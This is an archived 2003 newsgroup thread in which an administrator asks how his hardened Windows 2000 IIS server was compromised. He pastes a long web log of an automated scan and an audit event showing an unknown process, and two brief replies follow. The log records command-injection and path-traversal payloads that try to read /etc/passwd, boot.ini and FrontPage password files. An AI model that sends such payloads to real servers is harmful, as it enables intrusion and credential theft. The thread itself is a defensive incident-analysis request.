Re: I was hacked

From: Patrick Kremer (n/a)
Date: 08/05/03

  • Next message: George: "How to design a secure file transfer application ?"
    Date: Tue, 5 Aug 2003 00:09:16 -0500
    
    

    I don't know how it relates to this whole thing, but A~NSISu_.exe sounds
    quite a bit like Nullsoft Install System (create a Win32 self-extracting
    executable installer) http://www.nullsoft.com/free/nsis/.

    "George Hester" <hesterloli@hotmail.com> wrote in message
    news:eLSB$JoWDHA.3924@tk2msftngp13.phx.gbl...
    I saw no successes in your IIS Log. Believe me, if that was true for all
    your connections you wouldn't be serving anything.

    -- 
    George Hester
    __________________________________
    "Frank" <frank@nospamplease.com> wrote in message
    news:VUZWa.36782$Vt6.14734@rwcrnsc52.ops.asp.att.net...
    > I have a Windows 2000 server that is current w/ the latest patches from
    > MS. It is running an IIS server that is configured w/ Microsoft's URLScan
    > tool. It is also running Terminal Services w/ 128 bit encryption turned
    > on. I have a firewall configured to allow only inbound/outbound HTTP
    > traffic on port 80 and Terminal Services. I'm also running Snort as an
    > IDS, a virus scanner that updates/scans nightly. I have Windows security
    > auditing turned on. I've also hardened the system by turning off all
    > unnecessary services and making all the appropriate registry changes to
    > restrict access (e.g. disabling anonymous access).
    >
    > Sounds somewhat secure, right?
    >
    > Last night I was hacked. I'm still trying to sort out what happened. I
    > saw a series of attempts to attack IIS that the IIS log claimed were
    > coming from itself. Unfortunately, my firewall was not logging HTTP
    > traffic - although I think I have the source ip via Snort. All these
    > attacks failed. Next, I saw a series of logon failures using Terminal
    > Services. Again, all of these failed. Then, a few minutes later, I
    > mysteriously see a process called A~NSISu_.exe. This seems to come out of
    > nowhere. Prior to this I did not see any cmd sessions or anything else
    > that suggests the attacker successfully breached my server.
    >
    > Below is the web log followed by the event in the event viewer that
    > showed the first visible process of the attack. Following this, I saw a
    > series of processes start (cmd.exe, nbstat, route).
    >
    > I can take care of reinstalling and hardening my system. I have one
    > primary concern at this stage: understanding how they cracked my server.
    > If you have advice or suggestions, it would be appreciated.
    >
    >
    >
    >
    >
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/*.idc 404 4184 21 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /iisadmin/ - 404 4184 25 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/default.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr 404 4184 931 16 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /msadc/msadcs.dll - 404 4184 32 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/iisadmin/bdir.htr 404 4184 41 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/iissamples/issamples/query.idq 404 4184 46 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/iissamples/issamples/fastq.idq 404 4184 46 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/iissamples/exair/search/search.idq 404 4184 50 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/iissamples/exair/search/query.idq 404 4184 49 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/prxdocs/misc/prxrch.idq 404 4184 39 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/iissamples/issamples/oop/qfullhit.htw 404 4184 143 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/iissamples/issamples/oop/qsumrhit.htw 404 4184 143 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/qfullhit.htw 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/qsumrhit.htw 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/abczxv.htw 404 4184 26 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/author.idq 404 4184 49 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/filesize.idq 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/filetime.idq 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/query.idq 404 4184 48 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/queryhit.idq 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/simple.idq 404 4184 49 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/webhits.exe 404 4184 50 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cfcache.map - 404 4184 27 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /_vti_pvt/administrators.pwd - 403 4358 43 344 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /_vti_pvt/authors.pwd - 403 4358 36 16 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /_vti_pvt/users.pwd - 403 4358 34 16 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /_vti_pvt/service.pwd - 403 4358 36 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 POST /_vti_bin/shtml.dll/_vti_rpc - 405 4230 368 15 10.2.2.50 MSFrontPage/4.0
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/ - 404 4184 24 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /scripts/ - 401 4572 48 47 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/sh - 404 4184 26 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/csh - 404 4184 27 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/ksh - 404 4184 27 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/cmd.exe 404 4184 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/cmd.exe 404 4184 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/cmd32.exe 404 4184 33 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/cmd32.exe 404 4184 33 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/perl.exe 404 4184 35 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/perl.exe 404 4184 35 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/tools/newdsn.exe 404 4184 40 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/fpcount.exe 404 4184 71 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/rightfax/fuwww.dll/ 404 4184 36 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /iissamples/issamples/query.asp - 403 4270 46 78 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /samples/search/queryhit.htm - 404 4184 43 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /scripts/*+.pl - 401 4572 62 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /iissamples/exair/search/advsearch.asp - 403 4270 53 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/iisadmpwd/aexp3.htr 404 4184 35 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /scripts/repost.asp - 403 4270 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/ 404 4184 20 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/users/ 404 4184 26 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/ 404 4184 28 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/ 404 4184 28 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /iissamples/exair/howitworks/codebrws.asp - 403 4270 56 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /msadc/samples/selector/showcode.asp - 403 4270 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /index.htm PageServices 200 0 29 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /search - 404 4184 23 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /index.html+ - 404 4184 29 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/rguest.exe 404 4184 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/rguest.exe 404 4184 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/wguest.exe 404 4184 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/wguest.exe 404 4184 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/get32.exe 404 4184 33 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/alibaba.pl - 404 4184 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/tst.bat 404 4184 31 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-win/uploader.exe 404 4184 36 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/FormHandler.cgi - 404 4184 39 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/testcgi - 404 4184 31 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/test-cgi/* * 404 4184 36 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/test.cgi - 404 4184 32 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/enivron.pl - 404 4184 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /scripts/environ.pl - 401 4572 68 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /server-info - 404 4184 27 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /server-status - 404 4184 29 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/tcsh - 404 4184 28 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/cgitest.exe 404 4184 35 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /~root - 404 4184 21 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /~ftp - 404 4184 20 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/phf Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= 404 4184 80 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/count.cgi - 404 4184 33 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/nph-test-cgi - 404 4184 36 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/webdist.cgi - 404 4184 35 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/aglimpse.cgi - 404 4184 36 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/campas %0acat%0a/etc/passwd%0a 404 4184 54 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/jj - 404 4184 26 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/formmail - 404 4184 32 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/formmail.pl - 404 4184 35 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/faxsurvey /bin/cat%20/etc/passwd 404 4184 56 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/view-source ../../../../../../../etc/passwd 404 4184 67 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/srchadm/webhits.exe 404 4184 43 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/tools/mkilog.exe 404 4184 40 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/tools/mkplog.exe 404 4184 40 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/query mss=../../../../../../../etc/passwd 404 4184 65 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/htimage.exe 404 4184 39 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/htimage.exe 404 4184 39 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/author.idq 404 4184 49 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/filesize.idq 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/filetime.idq 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/query.idq 404 4184 48 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/queryhit.idq 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/simple.idq 404 4184 49 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/qfullhit.htw 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/qsumrhit.htw 404 4184 51 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/scripts/samples/search/webhits.exe 404 4184 50 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /robots.txt - 404 4184 26 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/echo.bat 404 4184 41 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/hello.bat 404 4184 42 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/htsearch exclude=%60/etc/passwd%60 404 4184 58 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/ezshopper/loadpage.cgi user_id=1&file=|cat%20/etc/passwd| 404 4184 81 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/ezshopper/search.cgi user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 404 4184 127 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/names.nsf/ 404 4184 31 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/catalog.nsf/ 404 4184 33 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/log.nsf/ 404 4184 29 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/domlog.nsf/ 404 4184 32 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/domcfg.nsf/ 404 4184 32 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/sojourn.cgi cat=../../../../../../../etc/passwd 404 4184 71 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/ows-bin/perlidlc.bat 404 4184 41 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-bin/windmail.exe 404 4184 36 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /_vti_bin/shtml.dll - 403 4358 34 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /.htaccess - 404 4184 25 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /_vti_pvt/doctodep.btr - 403 4358 37 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /carbo.dll icatcommand=..\..\..\..\boot.ini&catalogname=catalog 404 4184 78 16 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cfdocs/expeval/ExprCalc.cfm OpenFilePath=c:\boot.ini 404 4184 68 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cfdocs/expeval/openfile.cfm - 404 4184 43 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/pfdispaly.cgi '%0A/bin/uname%20-a|' 404 4184 59 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/MachineInfo - 404 4184 35 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /mylog.phtml screen=/etc/passwd 404 4184 46 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /mlog.phtml screen=/etc/passwd 404 4184 45 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /cgi-bin/wrap - 404 4184 28 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/ows-bin/oasnetconf.exe 404 4184 72 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/ows-bin/oaskill.exe 404 4184 45 0 - -
    > 2003-08-02 05:54:56 192.168.0.1 - W3SVC1 MYSERVER 192.168.0.1 80 GET /<Rejected-By-UrlScan> ~/cgi-shl/win-c-sample.exe 404 4184 40 0 - -
    >
    >
    >
    >
    > Event Type: Success Audit
    > Event Source: Security
    > Event Category: Detailed Tracking
    > Event ID: 592
    > Date:  8/2/2003
    > Time:  2:50:28 AM
    > User:  MYSERVER\MyAdmin
    > Computer: MYSERVER
    > Description:
    > A new process has been created:
    >   New Process ID: 1764
    >   Image File Name: \DOCUME~1\ADMINI~1\LOCALS~1\Temp\A~NSISu_.exe
    >   Creator Process ID: 1916
    >   User Name: MyAdmin
    >   Domain:  MYSERVER
    >   Logon ID:  (0x0,0xDE65)
    >
    >
    >
    >
    >
    
